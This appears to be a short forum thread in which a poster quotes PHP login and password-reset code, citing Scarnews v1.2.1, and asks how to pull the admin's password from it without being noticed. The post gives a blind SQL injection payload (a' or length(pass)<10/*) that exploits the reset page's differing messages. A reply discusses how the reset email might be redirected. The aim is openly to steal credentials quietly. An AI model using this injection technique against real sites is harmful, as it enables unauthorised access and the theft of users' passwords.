Hi,

lately I have seen quite a few scripts with the following login procedure:

-------------------------------------------------------------------
$login_rs = mysql_query("SELECT id, pass FROM user WHERE login='$news_user'");
if(mysql_num_rows($login_rs) > 0){
$login_array = mysql_fetch_array($login_rs);
if($login_array["pass"] == $news_pass){
...
} else { $login_err=TRUE; }
} else { $login_err=TRUE; }
-------------------------------------------------------------------

I can't think of a way to use this for a successful sql-injection (getting the admin's id and pass).
The output is always the same unless I really enter the correct pass (at least I do not have to guess the user).

Nevertheless often there is the option given to retrieve the pass via email.
-------------------------------------------------------------------
$email_rs = mysql_query("SELECT * FROM user WHERE email='$email'");
$email_array = mysql_fetch_array($email_rs);

if(mysql_num_rows($email_rs)>0){
...
$msg = ("The password has been sent.");
} else {
$msg = ("Unknown email address!");
}
-------------------------------------------------------------------
I can use this code for intelligent password guessing because I do get two different ouputs depending on success or failure.

Example: a' or length(pass)<10/*
This should give me the output "The password has been sent." if the pass is no longer than 9 chars.
The problem is that every time I am successful with my guessing the script tries to send an email.

Any ideas how to use those two code snippets to retrieve the admin's data without causing a huge sensation?

tbs

Example: Scarnews v1.2.1

i guess it depends wheter or not they use your user input as the email address to send the data to, or the one retrieved from db.